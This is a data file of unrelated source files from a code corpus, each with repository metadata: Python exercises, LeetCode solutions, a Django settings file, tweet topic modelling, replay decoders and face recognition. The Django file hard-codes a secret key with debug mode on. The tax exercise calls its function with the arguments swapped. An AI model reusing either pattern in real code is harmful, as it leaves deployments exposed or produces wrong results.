f8e54ed7de4fa1713441907b2b002188d27537c3 | d7da288db4fd9fc0bb1c60c5074f290b5f70c8ef | /Aulas Python/Conteúdo das Aulas/033/Gabarito/Exercício 1 - Gabarito.py | 897f4b881fb6433e5d3d0ea8f4c4d834a4d639ac | [] | no_license | luizdefranca/Curso-Python-IgnoranciaZero | dbf4cf342b3f3efea6fb3b8cf27bf39ed92927e9 | 9fbf2f25e3e6fce1f1582af0bd6bc7dbc5b9f588 | refs/heads/master | 2020-04-09T07:17:00.735378 | 2016-09-12T10:51:37 | 2016-09-12T10:51:37 | 67,999,169 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 613 | py | """
Faça um programa com uma função chamada somaImposto.
A função possui dois parâmetros formais:
1 - taxaImposto, que é a quantia de imposto sobre vendas expressa em
porcentagem
2 - custo, que é o custo de um item antes do imposto.
A função “altera” o valor de custo para incluir o imposto sobre vendas.
"""
def somaImposto(taxaImposto, custo):
return custo*(1 + taxaImposto/100)
custo_normal = float(input("Digite o custo(R$): "))
taxa = float(input("Digite a taxa de imposto(%): "))
print("O custo recalculado com o imposto é de R$%.2f"%somaImposto(custo_normal, taxa))
| [
"luizramospe@hotmail.com"
] | luizramospe@hotmail.com |
a23d7eb0986e35a380e694c33ea645d2021db241 | 8f40f6b22dc896335abed7ce21d8f427efbf70b5 | /src/eschool/settings.py | 0ccb8669178e03a4f3b02d1dc39611c7f0a287e7 | [
"MIT"
] | permissive | Vansh983/e-school | c54835a43eaa919713d1f394f35f87223197c697 | 2d8458a3a649ae7f5788b1f7fb2d7179fcccdea0 | refs/heads/master | 2020-09-22T21:10:22.346362 | 2019-12-01T18:37:19 | 2019-12-01T18:37:19 | 225,322,071 | 2 | 0 | MIT | 2019-12-02T08:21:28 | 2019-12-02T08:21:27 | null | UTF-8 | Python | false | false | 3,299 | py | """
Django settings for eschool project.
Generated by 'django-admin startproject' using Django 2.2.7.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# For static files
PROJECT_ROOT = os.path.abspath(os.path.dirname(__file__))
STATICFILES_DIRS = (
os.path.join(PROJECT_ROOT, 'static'),
)
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'o89esr=m9^lf-$q$ev$86ne1tcf6_5u2qx!hm22%q_qb4x-kib'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'home',
'accounts',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'eschool.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'eschool.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
| [
"alberto.navalonlillo@gmail.com"
] | alberto.navalonlillo@gmail.com |
9679197a61ccf26610d250d3868a81a8e7401233 | 3e9cdcc8847da5a2ea8391639ad8fd95592475b1 | /696.py | edda7ebd43c2b347e2386e5ca317ea69007a5d58 | [] | no_license | mindentropy/leetcode | ec790ed671a2224411133af127e605438bbbbe52 | 4a24edca5926c0b10d1a4786262dd403b12d1aee | refs/heads/master | 2023-01-27T11:26:07.949478 | 2023-01-25T19:08:18 | 2023-01-25T19:08:18 | 233,759,165 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 810 | py | #!/usr/bin/env python
class Solution(object):
def countBinarySubstrings(self, s):
strcnt = 0
i = 0
while i < len(s) - 1:
j = i + 1
oppcnt = 1
eqflag = True
while j < len(s):
if s[i] == s[j]:
if eqflag == False:
break
oppcnt += 1
else:
oppcnt -= 1
eqflag = False
j += 1
if oppcnt <= 0:
break
if oppcnt == 0:
strcnt += 1
i += 1
return strcnt
class Solution(object):
def countBinarySubstrings(self, s):
group = [1]
for idx in xrange(1, len(s)):
if s[idx - 1] != s[idx]:
group.append(1)
else:
group[-1] += 1
cnt = 0
for idx in xrange(len(group) - 1):
cnt += min(group[idx], group[idx + 1])
return cnt
if __name__ == '__main__':
sol = Solution()
print sol.countBinarySubstrings('00110011')
| [
"mindentropy@gmail.com"
] | mindentropy@gmail.com |
830b34bfb2dece6d806d63c167e8d1b7584b9087 | c1da5c1530ff768d9c9ed61b70f7913eb1c4172e | /Practice/Matrix/AkshayAlphabeticTraversal.py | 3f6ee2fac6d427a29ef944c56591f39235846fcb | [] | no_license | saumyasinha023/PythonProgramming | b3773d52e1058deebeffab0315d154784c154f87 | 610474ee649df184ff24c00d869f69ffd7af52e5 | refs/heads/master | 2021-05-10T11:02:11.160595 | 2018-03-12T17:29:34 | 2018-03-12T17:29:34 | 118,398,400 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 606 | py | class Solution():
def traverse(self, mat):
final, path = [], []
self.helper(mat, final, path, 0, 0)
print(final)
def helper(self, mat, final, path, each, every):
if each >= len(mat) or every >= len(mat[0]) or each < 0 or every < 0:
return
if each == len(mat) - 1 and every == len(mat[0]) - 1:
final.append(path)
self.helper(mat, final, path + ['H'], each, every + 1)
self.helper(mat, final, path + ['V'], each + 1, every)
return final
S = Solution()
S.traverse([[0, 0, 0, 0], [0, 0, 0, 0], [0, 0, 0, 0]])
| [
"saumyasinha023@gmail.com"
] | saumyasinha023@gmail.com |
dc54a632a8eb63b286896f488c5370a27ece786f | ee30ecc3228d41374ff915d945d658495eb74916 | /utils/topic_model.py | 3906d16dcd59b1138ba76d06bb46718f48f8d26d | [] | no_license | Xueping/social_sentiment | 46204c1c1d1832d1058825af24e83454ecfc4b65 | 9b1ee521f7c3d60a268354fe2cb5f8eb85d69525 | refs/heads/master | 2023-02-16T14:46:31.278671 | 2021-01-13T07:57:00 | 2021-01-13T07:57:00 | 282,819,101 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,337 | py | from vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer
# from utils import clean_tweets, update_stopwords
from utils.utils import clean_tweets, update_stopwords
# from sentiment.utils import clean_tweets, update_stopwords
import collections
import pandas as pd
import gensim
from gensim import corpora
import nltk
from nltk.corpus import wordnet as wn
from nltk.stem.wordnet import WordNetLemmatizer
from nltk.tokenize import TweetTokenizer
nltk.download('wordnet')
tknzr = TweetTokenizer()
def word_frequency(wd_list, stopwords, top_k=None):
all_words = ' '.join([text for text in wd_list])
filtered_words = [word.lower() for word in all_words.split() if word.lower() not in stopwords]
counted_words = collections.Counter(filtered_words)
words_counts = {}
if top_k is None:
wc = counted_words.most_common()
else:
wc = counted_words.most_common(top_k)
for letter, count in wc:
words_counts[letter] = count
return words_counts
# NLTK’s Wordnet to find the meanings of words, synonyms, antonyms, and more.
def get_lemma(word):
lemma = wn.morphy(word)
if lemma is None:
return word
else:
return lemma
# WordNetLemmatizer to get the root word.
def get_lemma2(word):
return WordNetLemmatizer().lemmatize(word)
def prepare_text_for_lda(text, en_stop):
tokens = tknzr.tokenize(text)
# filter token whose length is more than 4
tokens = [token for token in tokens if len(token) > 4]
# filter the stop words and lowercase token
tokens = [token.lower() for token in tokens if token.lower() not in en_stop]
# NLTK’s Wordnet to find the meanings of words, synonyms, antonyms, and more.
tokens = [get_lemma(token) for token in tokens]
# get the root word
tokens = [get_lemma2(token) for token in tokens]
return tokens
def lda_model(tweets, stop_words, num_topic, num_words):
text_data = []
for tweet in tweets:
tokens = prepare_text_for_lda(tweet, stop_words)
text_data.append(tokens)
# build dictionary id2word
dictionary = corpora.Dictionary(text_data)
# create corpus, document to bag of words
corpus = [dictionary.doc2bow(text) for text in text_data]
# print(corpus)
ldamodel = gensim.models.ldamodel.LdaModel(corpus,
num_topics=num_topic,
id2word=dictionary,
passes=15)
topics = ldamodel.print_topics(num_words)
return topics, dictionary, corpus
if __name__ == '__main__':
num_topic = 10
num_words = 10
analyser = SentimentIntensityAnalyzer()
file_name = "tweets_trump_wall.csv"
df_text = pd.read_csv(file_name)
tweets = clean_tweets(df_text.text)
# additional stopwords
new_stopwords = [ '&', '-', '…', 'one', 'got', 'to…', '...']
stop_words = update_stopwords(new_stopwords)
# get word frequency
word_frq = word_frequency(tweets, stop_words)
print(word_frq)
# get topic model
topics, dictionary, corpus = lda_model(tweets, stop_words, num_topic, num_words)
for topic in topics:
print(topic)
# token to id in dictionary
print(dictionary.token2id)
# token_id to document
print(corpus)
| [
"xueping.peng@uts.edu.au"
] | xueping.peng@uts.edu.au |
daab4e7b32ce7108371efd534f90e539cb5ecffe | 3b20b70f832c08e70cbe93e48a2afc50f2f90824 | /challenge-3/challenge3.py | dd05ac4fc570a0cbad508e6a2d6d534e8a5e04ce | [] | no_license | xabinapal/tuenti-challenge-10 | d3d29ac80a2617acef9db4a2355d82feef62be5a | d37317041c543811ef117490139dba03a182b5fc | refs/heads/master | 2022-06-27T07:01:01.604062 | 2020-05-10T14:41:49 | 2020-05-10T14:41:49 | 261,166,819 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,406 | py | from collections import defaultdict
ORDERED_CHARS = (
"a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k",
"l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v",
"w", "x", "y", "z", "á", "é", "í", "ñ", "ó", "ú", "ü")
word_count = defaultdict(int)
longest_word = 0
with open("../assets/challenge-3/pg17013.txt") as f:
word = ""
while True:
char = f.read(1)
if not char:
break
char = char.lower()
if char in ORDERED_CHARS:
word += char
elif len(word) >= 3:
word_count[word] += 1
longest_word = max(longest_word, len(word))
word = ""
else:
word = ""
def transform_word(word):
padding = [len(ORDERED_CHARS) + 1] * (longest_word - len(word))
return [len(ORDERED_CHARS) - ORDERED_CHARS.index(char) for char in word] + padding
word_list = sorted(
word_count.items(),
reverse=True,
key=lambda word: (word[1], *transform_word(word[0])))
for case in range(1, int(input()) + 1):
data = input()
try:
ranking = int(data)
word, instances = word_list[ranking - 1]
print(f"Case #{case}: {word} {instances}")
except:
ranking, instances = next(
(word[0] + 1, word[1][1])
for word in enumerate(word_list) if word[1][0] == data)
print(f"Case #{case}: {instances} #{ranking}") | [
"naxabier@gmail.com"
] | naxabier@gmail.com |
7e704aa9900eaae365c0bc39c1cd6c4ec2f9c868 | 904dea38a37577b7bdf7659f8b7d5ca6c3ded080 | /zephyrus_sc2_parser/s2protocol_fixed/decoders.py | 4b5d92e76565011ea918f42e0303c596f27a10b3 | [
"MIT"
] | permissive | ZephyrBlu/zephyrus-sc2-parser | cae674991d1bb6e3ab31369c66d08eefa2002b31 | 230c0d85802b0c5ddf8bde2883dc1f9d0cc68856 | refs/heads/master | 2023-05-28T02:47:38.245313 | 2022-11-21T13:24:56 | 2022-11-21T13:24:56 | 211,752,451 | 37 | 8 | MIT | 2023-05-22T22:44:29 | 2019-09-30T01:35:39 | Python | UTF-8 | Python | false | false | 10,036 | py | # Copyright (c) 2013-2017 Blizzard Entertainment
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import struct
from zephyrus_sc2_parser.s2protocol_fixed.compat import byte_to_int
class TruncatedError(Exception):
pass
class CorruptedError(Exception):
pass
class BitPackedBuffer:
def __init__(self, contents, endian='big'):
self._data = contents or []
self._used = 0
self._next = None
self._nextbits = 0
self._bigendian = (endian == 'big')
def __str__(self):
s = '{:02x}'.format(byte_to_int(self._data[self._used])) \
if self._used < len(self._data) else '--'
return 'buffer({0:02x}/{1:d},[{2:d}]={3:s})'.format(
self._nextbits and self._next or 0,
self._nextbits,
self._used,
s
)
def done(self):
return self._nextbits == 0 and self._used >= len(self._data)
def used_bits(self):
return self._used * 8 - self._nextbits
def byte_align(self):
self._nextbits = 0
def read_aligned_bytes(self, bytes):
self.byte_align()
data = self._data[self._used:self._used + bytes]
self._used += bytes
if len(data) != bytes:
raise TruncatedError(self)
return data
def read_bits(self, bits):
result = 0
resultbits = 0
while resultbits != bits:
if self._nextbits == 0:
if self.done():
raise TruncatedError(self)
self._next = byte_to_int(self._data[self._used])
self._used += 1
self._nextbits = 8
copybits = min(bits - resultbits, self._nextbits)
copy = (self._next & ((1 << copybits) - 1))
if self._bigendian:
result |= copy << (bits - resultbits - copybits)
else:
result |= copy << resultbits
self._next >>= copybits
self._nextbits -= copybits
resultbits += copybits
return result
def read_unaligned_bytes(self, bytes):
return ''.join([chr(self.read_bits(8)) for i in range(bytes)])
class BitPackedDecoder:
def __init__(self, contents, typeinfos):
self._buffer = BitPackedBuffer(contents)
self._typeinfos = typeinfos
def __str__(self):
return self._buffer.__str__()
def instance(self, typeid):
if typeid >= len(self._typeinfos):
raise CorruptedError(self)
typeinfo = self._typeinfos[typeid]
#print ' -- instance ', typeid, typeinfo
return getattr(self, typeinfo[0])(*typeinfo[1])
def byte_align(self):
self._buffer.byte_align()
def done(self):
return self._buffer.done()
def used_bits(self):
return self._buffer.used_bits()
def _array(self, bounds, typeid):
length = self._int(bounds)
return [self.instance(typeid) for i in range(length)]
def _bitarray(self, bounds):
length = self._int(bounds)
return (length, self._buffer.read_bits(length))
def _blob(self, bounds):
length = self._int(bounds)
result = self._buffer.read_aligned_bytes(length)
return result
def _bool(self):
return self._int((0, 1)) != 0
def _choice(self, bounds, fields):
tag = self._int(bounds)
if tag not in fields:
raise CorruptedError(self)
field = fields[tag]
return {field[0]: self.instance(field[1])}
def _fourcc(self):
return self._buffer.read_unaligned_bytes(4)
def _int(self, bounds):
return bounds[0] + self._buffer.read_bits(bounds[1])
def _null(self):
return None
def _optional(self, typeid):
exists = self._bool()
return self.instance(typeid) if exists else None
def _real32(self):
return struct.unpack('>f', self._buffer.read_unaligned_bytes(4))
def _real64(self):
return struct.unpack('>d', self._buffer.read_unaligned_bytes(8))
def _struct(self, fields):
result = {}
for field in fields:
if field[0] == '__parent':
parent = self.instance(field[1])
if isinstance(parent, dict):
result.update(parent)
elif len(fields) == 1:
result = parent
else:
result[field[0]] = parent
else:
result[field[0]] = self.instance(field[1])
return result
class VersionedDecoder:
def __init__(self, contents, typeinfos):
self._buffer = BitPackedBuffer(contents)
self._typeinfos = typeinfos
def __str__(self):
return self._buffer.__str__()
def instance(self, typeid):
if typeid >= len(self._typeinfos):
raise CorruptedError(self)
typeinfo = self._typeinfos[typeid]
return getattr(self, typeinfo[0])(*typeinfo[1])
def byte_align(self):
self._buffer.byte_align()
def done(self):
return self._buffer.done()
def used_bits(self):
return self._buffer.used_bits()
def _expect_skip(self, expected):
if self._buffer.read_bits(8) != expected:
raise CorruptedError(self)
def _vint(self):
b = self._buffer.read_bits(8)
negative = b & 1
result = (b >> 1) & 0x3f
bits = 6
while (b & 0x80) != 0:
b = self._buffer.read_bits(8)
result |= (b & 0x7f) << bits
bits += 7
return -result if negative else result
def _array(self, bounds, typeid):
self._expect_skip(0)
length = self._vint()
return [self.instance(typeid) for i in range(length)]
def _bitarray(self, bounds):
self._expect_skip(1)
length = self._vint()
return (length, self._buffer.read_aligned_bytes((length + 7) / 8))
def _blob(self, bounds):
self._expect_skip(2)
length = self._vint()
return self._buffer.read_aligned_bytes(length)
def _bool(self):
self._expect_skip(6)
return self._buffer.read_bits(8) != 0
def _choice(self, bounds, fields):
self._expect_skip(3)
tag = self._vint()
if tag not in fields:
self._skip_instance()
return {}
field = fields[tag]
return {field[0]: self.instance(field[1])}
def _fourcc(self):
self._expect_skip(7)
return self._buffer.read_aligned_bytes(4)
def _int(self, bounds):
self._expect_skip(9)
return self._vint()
def _null(self):
return None
def _optional(self, typeid):
self._expect_skip(4)
exists = self._buffer.read_bits(8) != 0
return self.instance(typeid) if exists else None
def _real32(self):
self._expect_skip(7)
return struct.unpack('>f', self._buffer.read_aligned_bytes(4))
def _real64(self):
self._expect_skip(8)
return struct.unpack('>d', self._buffer.read_aligned_bytes(8))
def _struct(self, fields):
self._expect_skip(5)
result = {}
length = self._vint()
for i in range(length):
tag = self._vint()
field = next((f for f in fields if f[2] == tag), None)
if field:
if field[0] == '__parent':
parent = self.instance(field[1])
if isinstance(parent, dict):
result.update(parent)
elif len(fields) == 1:
result = parent
else:
result[field[0]] = parent
else:
result[field[0]] = self.instance(field[1])
else:
self._skip_instance()
return result
def _skip_instance(self):
skip = self._buffer.read_bits(8)
if skip == 0: # array
length = self._vint()
for i in range(length):
self._skip_instance()
elif skip == 1: # bitblob
length = self._vint()
self._buffer.read_aligned_bytes((length + 7) / 8)
elif skip == 2: # blob
length = self._vint()
self._buffer.read_aligned_bytes(length)
elif skip == 3: # choice
tag = self._vint()
self._skip_instance()
elif skip == 4: # optional
exists = self._buffer.read_bits(8) != 0
if exists:
self._skip_instance()
elif skip == 5: # struct
length = self._vint()
for i in range(length):
tag = self._vint()
self._skip_instance()
elif skip == 6: # u8
self._buffer.read_aligned_bytes(1)
elif skip == 7: # u32
self._buffer.read_aligned_bytes(4)
elif skip == 8: # u64
self._buffer.read_aligned_bytes(8)
elif skip == 9: # vint
self._vint()
| [
"lukejholroyd@gmail.com"
] | lukejholroyd@gmail.com |
3e71ece847c365bef59fc95b8456057f4ddad690 | 9e12684c1e099daf85bad4f2f140edda9edc1d9f | /survey/admin.py | 81e889848f5c19add5d8b8cadb81c1ea2747d65e | [] | no_license | RuaConIT/AICOVIDVN-APP | 6c3428f2478a099c10b20bdffc585bef55732752 | 359387415c3c206ffbb76f1c42be3eb8298f04c3 | refs/heads/main | 2023-07-16T14:18:27.491587 | 2021-08-27T15:10:40 | 2021-08-27T15:10:40 | 392,717,079 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 118 | py | from django.contrib import admin
from .models import Survey
# Register your models here.
admin.site.register(Survey) | [
"mhieuhcmup@gmail.com"
] | mhieuhcmup@gmail.com |
9177a04c5edb5ecbaff8f25d73b1cbf82f9d1ba1 | 73527b489a9dd792e1e5c3a52afa27988acecd8e | /Case225.py | aeb7f7b40389da9cb7bd2c316d0bc3ee33eac7bc | [] | no_license | guxiajun/TestCases | 3d3a3922775b239491b75d43d718f332d4a3ebcd | 2c2e5fd53abdb9370228fd34f5a7448223ddac7b | refs/heads/master | 2020-08-31T10:58:57.683799 | 2020-05-07T12:53:20 | 2020-05-07T12:53:20 | 218,674,738 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,460 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import ctypes
import time
import os
import random
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
path = BASE_DIR+"/libpycmd.so"
print(path)
def needterms():
return "2"
def categories():
return "broadcast"
def shortDesc():
return "(外部源直播)进入频道,两个主播连麦720P2400K,限制上行弱网1000K+20%丢包+200msdelay,统计设备B侧的卡顿率和延时"
def detailDesc():
return "(直播)A B设备一直在同一个频道内,设置设备的上行丢包策略,通过log计算播放侧的卡顿率"
def run():
ll= ctypes.cdll.LoadLibrary
lib = ll(path)
lib.ExeCmdCallBack(0, "impairNet,0")
lib.ExeCmdCallBack(1, "impairNet,0")
lib.ExeCmdCallBack(0, "Readyuv,agora_720_1280_30.yuv,720,1280,30,0")
lib.ExeCmdCallBack(0, "setParameters,{\"rtc.log_size\":20000000}")
lib.ExeCmdCallBack(1, "setParameters,{\"rtc.log_size\":20000000}")
lib.ExeCmdCallBack(0, "setParameters,{\"che.video.LogcatVideoQoS\":1}")
lib.ExeCmdCallBack(1, "setParameters,{\"che.video.LogcatVideoQoS\":1}")
lib.ExeCmdCallBack(0, "setExternalVideoSource,true,false,true")
lib.ExeCmdCallBack(0, "setChannelProfile,1")
lib.ExeCmdCallBack(0, "setClientRole,1,nil")
lib.ExeCmdCallBack(0, "setVideoEncoderConfiguration,1280,720,15,2400,0")
lib.ExeCmdCallBack(0, "enableVideo")
lib.ExeCmdCallBack(0, "setupLocalVideo,2,-1")
lib.ExeCmdCallBack(0, "setupRemoteVideo,2,2,-1")
Testchannelname = "Test"+str(random.random())
lib.ExeCmdCallBack(0, "joinChannelByKey,nil,"+Testchannelname+",nil,1")
lib.ExeCmdCallBack(1, "setChannelProfile,1")
lib.ExeCmdCallBack(1, "setClientRole,1,nil")
lib.ExeCmdCallBack(1, "setVideoEncoderConfiguration,1280,720,15,2400,0")
lib.ExeCmdCallBack(1, "enableVideo")
lib.ExeCmdCallBack(1, "setupLocalVideo,2,-1")
lib.ExeCmdCallBack(1, "setupRemoteVideo,1,2,-1")
lib.ExeCmdCallBack(1, "joinChannelByKey,nil,"+Testchannelname+",nil,2")
time.sleep(10)
lib.ExeCmdCallBack(0, "impairNet,1000 20 200")
lib.ExeCmdCallBack(0, "SLEEP,180")
lib.ExeCmdCallBack(0, "setExternalVideoSource,false,false,true")
lib.ExeCmdCallBack(0, "leaveChannel")
lib.ExeCmdCallBack(1, "leaveChannel")
lib.ExeCmdCallBack(0, "impairNet,0")
lib.ExeCmdCallBack(0, "getFile")
lib.ExeCmdCallBack(1, "getFile")
lib.ExeCmdCallBack(1, "DELAY")
return "4" | [
"guxiajun@agora.io"
] | guxiajun@agora.io |
84b33528b8b77d2b5ba2007d6df3fe2fa7a90d89 | ebf6f5cb6be81e05ea152654a26c5a54c3e990db | /face_recognition/face_regconition_KNN.py | 86884f7228e71fded5e77b0ff26beb5a40495a1d | [
"MIT"
] | permissive | hoanmy/computer_vision_case_study | b8ac3e27f936b741fbd024700aff984a3e7cda49 | 8497a2c812f33ea6d055adcacdf39f225d1aa121 | refs/heads/master | 2020-04-17T00:54:13.298681 | 2019-06-27T07:34:21 | 2019-06-27T07:34:21 | 166,067,095 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,628 | py |
import math
from sklearn import neighbors
import os
import os.path
import pickle
from PIL import Image, ImageDraw, ImageFont
import cv2
from pathlib import Path
import face_recognition
from face_recognition.face_recognition_cli import image_files_in_folder
ALLOWED_EXTENSIONS = {'png', 'jpg', 'jpeg'}
font = ImageFont.truetype("arial.ttf", 30);
def train(train_dir, model_save_path=None, n_neighbors=None, knn_algo='ball_tree', verbose=False):
"""
Trains a k-nearest neighbors classifier for face recognition.
:param train_dir: directory that contains a sub-directory for each known person, with its name.
(View in source code to see train_dir example tree structure)
Structure:
<train_dir>/
├── <person1>/
│ ├── <somename1>.jpeg
│ ├── <somename2>.jpeg
│ ├── ...
├── <person2>/
│ ├── <somename1>.jpeg
│ └── <somename2>.jpeg
└── ...
:param model_save_path: (optional) path to save model on disk
:param n_neighbors: (optional) number of neighbors to weigh in classification. Chosen automatically if not specified
:param knn_algo: (optional) underlying data structure to support knn.default is ball_tree
:param verbose: verbosity of training
:return: returns knn classifier that was trained on the given data.
"""
X = []
y = []
# Loop through each person in the training set
for class_dir in os.listdir(train_dir):
if not os.path.isdir(os.path.join(train_dir, class_dir)):
continue
# Loop through each training image for the current person
for img_path in image_files_in_folder(os.path.join(train_dir, class_dir)):
image = face_recognition.load_image_file(img_path)
face_bounding_boxes = face_recognition.face_locations(image)
if len(face_bounding_boxes) != 1:
# If there are no people (or too many people) in a training image, skip the image.
if verbose:
print("Image {} not suitable for training: {}".format(img_path, "Didn't find a face" if len(face_bounding_boxes) < 1 else "Found more than one face"))
else:
# Add face encoding for current image to the training set
X.append(face_recognition.face_encodings(image, known_face_locations=face_bounding_boxes)[0])
y.append(class_dir)
# Determine how many neighbors to use for weighting in the KNN classifier
if n_neighbors is None:
n_neighbors = int(round(math.sqrt(len(X))))
if verbose:
print("Chose n_neighbors automatically:", n_neighbors)
# Create and train the KNN classifier
knn_clf = neighbors.KNeighborsClassifier(n_neighbors=n_neighbors, algorithm=knn_algo, weights='distance')
knn_clf.fit(X, y)
# Save the trained KNN classifier
if model_save_path is not None:
with open(model_save_path, 'wb') as f:
pickle.dump(knn_clf, f)
return knn_clf
def predict(X_img_path, knn_clf=None, model_path=None, distance_threshold=0.4):
"""
Recognizes faces in given image using a trained KNN classifier
:param X_img_path: path to image to be recognized
:param knn_clf: (optional) a knn classifier object. if not specified, model_save_path must be specified.
:param model_path: (optional) path to a pickled knn classifier. if not specified, model_save_path must be knn_clf.
:param distance_threshold: (optional) distance threshold for face classification. the larger it is, the more chance
of mis-classifying an unknown person as a known one.
:return: a list of names and face locations for the recognized faces in the image: [(name, bounding box), ...].
For faces of unrecognized persons, the name 'unknown' will be returned.
"""
if not os.path.isfile(X_img_path) or os.path.splitext(X_img_path)[1][1:] not in ALLOWED_EXTENSIONS:
raise Exception("Invalid image path: {}".format(X_img_path))
if knn_clf is None and model_path is None:
raise Exception("Must supply knn classifier either thourgh knn_clf or model_path")
# Load a trained KNN model (if one was passed in)
if knn_clf is None:
with open(model_path, 'rb') as f:
knn_clf = pickle.load(f)
# Load image file and find face locations
X_img = face_recognition.load_image_file(X_img_path)
X_face_locations = face_recognition.face_locations(X_img)
# If no faces are found in the image, return an empty result.
if len(X_face_locations) == 0:
return []
# Find encodings for faces in the test iamge
faces_encodings = face_recognition.face_encodings(X_img, known_face_locations=X_face_locations)
# Use the KNN model to find the best matches for the test face
closest_distances = knn_clf.kneighbors(faces_encodings, n_neighbors=1)
are_matches = [closest_distances[0][i][0] <= distance_threshold for i in range(len(X_face_locations))]
# Predict classes and remove classifications that aren't within the threshold
return [(pred, loc) if rec else ("unknown", loc) for pred, loc, rec in zip(knn_clf.predict(faces_encodings), X_face_locations, are_matches)]
def show_prediction_labels_on_image(img_path, predictions):
"""
Shows the face recognition results visually.
:param img_path: path to image to be recognized
:param predictions: results of the predict function
:return:
"""
pil_image = Image.open(img_path).convert("RGB")
draw = ImageDraw.Draw(pil_image)
for name, (top, right, bottom, left) in predictions:
# Draw a box around the face using the Pillow module
draw.rectangle(((left, top), (right, bottom)), outline=(0, 0, 255))
# There's a bug in Pillow where it blows up with non-UTF-8 text
# when using the default bitmap font
#name = name.encode("UTF-8")
# Draw a label with a name below the face
text_width, text_height = draw.textsize(name, font=font)
draw.rectangle(((left, bottom - text_height - 10), (right, bottom)), fill=(0, 0, 255), outline=(0, 0, 255))
draw.text((left + 6, bottom - text_height - 5), name, fill=(255, 255, 255, 255), font=font)
# Remove the drawing library from memory as per the Pillow docs
del draw
# Display the resulting image
# pil_image.show()
pil_image.save("output/" + Path(img_path).name)
if __name__ == "__main__":
# STEP 1: Train the KNN classifier and save it to disk
# Once the model is trained and saved, you can skip this step next time.
print("Training KNN classifier...")
classifier = train("./face_db", model_save_path="trained_knn_model.clf", n_neighbors=2)
print("Training complete!")
# STEP 2: Using the trained classifier, make predictions for unknown images
for image_file in os.listdir("test_db"):
full_file_path = os.path.join("test_db", image_file)
print("Looking for faces in {}".format(image_file))
# Find all people in the image using a trained classifier model
# Note: You can pass in either a classifier file name or a classifier model instance
predictions = predict(full_file_path, model_path="trained_knn_model.clf")
# Print results on the console
for name, (top, right, bottom, left) in predictions:
print("- Found {} at ({}, {})".format(name, left, top))
# Display results overlaid on an image
show_prediction_labels_on_image(os.path.join("test_db", image_file), predictions)
| [
"mynguyen@hp-envy"
] | mynguyen@hp-envy |
